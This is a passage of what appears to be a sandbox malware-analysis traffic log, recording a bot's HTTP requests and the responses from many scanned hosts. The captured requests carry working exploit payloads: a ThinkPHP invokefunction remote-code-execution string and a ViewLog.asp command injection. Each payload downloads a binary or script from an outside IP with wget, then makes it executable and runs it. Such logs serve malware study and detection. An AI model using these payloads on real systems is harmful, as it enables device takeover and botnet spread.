                                                      Feb 14, 2024 09:30:59.918586969 CET307INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:30:59 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 150
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      948192.168.2.153940695.100.191.24280
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:59.704531908 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:59.930619001 CET479INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 257
                                                      Expires: Wed, 14 Feb 2024 08:30:59 GMT
                                                      Date: Wed, 14 Feb 2024 08:30:59 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 64 63 64 31 66 35 35 37 26 23 34 36 3b 31 37 30 37 38 39 39 34 35 39 26 23 34 36 3b 35 61 63 34 37 36 35 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;dcd1f557&#46;1707899459&#46;5ac4765</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      949192.168.2.155053695.42.29.20180
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:59.704799891 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:59.936861038 CET49INHTTP/1.1 404 Site or Page Not Found
                                                      Feb 14, 2024 09:30:59.937305927 CET306INData Raw: 53 65 72 76 65 72 3a 20 44 56 52 44 56 53 2d 57 65 62 73 0d 0a 44 61 74 65 3a 20 57 65 64 20 46 65 62 20 31 34 20 31 31 3a 33 33 3a 30 31 20 32 30 32 34 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72
                                                      Data Ascii: Server: DVRDVS-WebsDate: Wed Feb 14 11:33:01 2024Pragma: no-cacheCache-Control: no-cacheContent-Type: text/html<html><head><title>Document Error: Site or Page Not Found</title></head><body><h2>Access Error: Site or Page Not Fou


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      950192.168.2.154864462.45.0.1978080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:59.734671116 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:00.089982033 CET166INHTTP/1.1 302 Found
                                                      Date: Wed, 14 Feb 2024 08:30:59 GMT
                                                      Location: http://192.168.0.14/remote.html
                                                      Content-Length: 0
                                                      Server: Jetty(8.1.16.v20140903)


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      951192.168.2.153881295.58.72.21580
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:59.762542963 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:31:00.070055962 CET29INHTTP/1.1 200 OK
                                                      Feb 14, 2024 09:31:00.072107077 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                      Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      952192.168.2.153669895.164.22.1080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:59.771528006 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:31:00.010565042 CET307INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:30:59 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 150
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      953192.168.2.155139695.86.125.19980
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:59.785772085 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      954192.168.2.153760285.192.56.1608080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:00.072027922 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:03.319505930 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:09.463232040 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:21.494853020 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:46.838275909 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      955192.168.2.155782031.136.251.358080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:00.470218897 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:01.111540079 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:02.359570026 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:04.855397940 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:09.975256920 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:19.959131956 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:40.694438934 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      956192.168.2.154899685.50.188.668080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:00.506185055 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:00.725805998 CET254INHTTP/1.0 302 Found
                                                      Server: httpd
                                                      Date: Wed, 14 Feb 2024 08:31:24 GMT
                                                      Location: index.htm
                                                      Pragma: no-cache
                                                      Cache-Control: no-cache,no-store,must-revalidate, post-check=0,pre-check=0
                                                      Expires: 0
                                                      CONTENT-LANGUAGE: en
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      957192.168.2.155249095.244.23.1318080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:00.520579100 CET1286INHTTP/1.0 400 Bad Request
                                                      Server: http server 1.0
                                                      Content-type: text/html
                                                      Date: Wed, 14 Feb 2024 08:30:59 GMT
                                                      Last-modified: Wed, 14 Feb 2024 08:30:59 GMT
                                                      Accept-Ranges: bytes
                                                      Connection: close
                                                      Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 2d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 67 69 66 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 67 69 66 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 67 69 66 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 67 69 66 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 7b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 4c 75 63 69 64 61 20 47 72 61 6e 64 65 2c 20 54 61 68 6f 6d 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 46 46 46 46 46 20 75 72 6c 28 27 2f 63 67 69 2d 62 69 6e 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 2f 65 72 72 5f 62 67 2e 6a 70 67 27 29 3b 0a 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 63 6f 6c 6f 72 3a 20 23 41 34 41 33 41 33 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 71 6e 61 70 5f 68 79 70 65 72 6c 69 6e 6b 20 61 2c 2e 71 6e 61 70 5f 68 79 70 65 72 6c 69 6e 6b 20 61 3a 6c 69 6e 6b 2c 2e 71 6e 61 70 5f 68 79 70 65 72 6c 69 6e 6b 20 61 3a 76 69 73 69 74 65 64 7b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 4c 75 63 69 64 61 20 47 72 61 6e 64 65 2c 20 54 61 68 6f 6d 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 63 6f 6c 6f 72 3a 20 23 41 34 41 33 41 33 3b 0a 7d 0a 2e 71 6e 61 70 5f 62 61 72 31 7b 0a 77 69 64 74 68 3a 20 39 38 30 70 78 3b 0a 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 42 43 42 43 42 43 3b 0a 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 30 70 78 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 7d 0a 2e 71 6e 61 70 5f 62 61 72 5f 69 6d 67 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="Cache-Control" content="no-cache" /><meta http-equiv="Pragma" content="no-cache" /><meta http-equiv="Expires" content="-1" /><link rel="shortcut icon" href="/images/favicon.gif" type="image/gif" /><link rel="icon" href="/images/favicon.gif" type="image/gif" /><style type="text/css">body{font-family:Verdana, Lucida Grande, Tahoma, Arial, Helvetica, sans-serif;font-size: 11px;background: #FFFFFF url('/cgi-bin/images/error/err_bg.jpg');overflow: hidden;color: #A4A3A3;text-align: center;}.qnap_hyperlink a,.qnap_hyperlink a:link,.qnap_hyperlink a:visited{font-family:Verdana, Lucida Grande, Tahoma, Arial, Helvetica, sans-serif;font-size: 11px;color: #A4A3A3;}.qnap_bar1{width: 980px;border-bottom: 1px solid #BCBCBC;padding-top: 10px;text-align: left;margin: 0 auto;}.qnap_bar_img{padding-botto


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      958192.168.2.154232494.110.114.1128080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:00.690193892 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      959192.168.2.154529894.123.65.748080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:00.718354940 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
